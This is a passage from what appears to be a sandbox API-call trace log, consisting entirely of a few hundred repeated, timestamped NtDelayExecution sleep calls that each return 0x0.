(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.257] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.258] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.263] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.265] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.266] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.268] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.269] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.271] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.272] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.274] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.275] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.278] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.280] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.281] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.284] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.286] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.289] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.300] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.304] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.307] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.315] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.316] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.318] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.319] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.321] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.327] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.354] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.355] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.357] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.364] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.366] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.372] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.378] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.383] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.387] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.390] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.396] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.399] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.402] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.405] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.410] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.421] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.425] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.436] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.448] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.465] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.470] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.473] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.474] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.480] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.678] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.680] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.681] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.714] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.763] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.777] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.832] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.846] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.900] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.947] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.981] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0152.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.072] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.098] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.116] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.131] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.201] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.248] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.283] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.317] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.333] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.381] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.433] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.486] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.533] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.633] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.680] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.682] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.683] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.685] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.702] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.718] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.749] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.780] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.781] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.803] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.819] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.833] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.880] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.885] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.919] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.949] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0153.986] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.004] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.033] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.049] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.065] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.080] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.082] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.084] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.088] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.105] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.121] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.136] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.151] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.167] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.194] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.205] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.222] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.249] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.252] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.267] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.285] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.287] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.288] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.290] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.295] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.296] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.298] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.299] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.301] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.302] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.303] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.305] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.306] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.308] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.310] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.320] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.322] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.324] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.325] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.326] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.328] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.334] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.336] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.337] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.339] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.340] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.342] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.343] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.345] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.348] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.349] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.350] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.352] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.358] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.359] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.360] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.363] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.365] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.367] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.368] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.370] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.371] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.373] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.374] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.375] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.377] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.379] NtDelayExecution 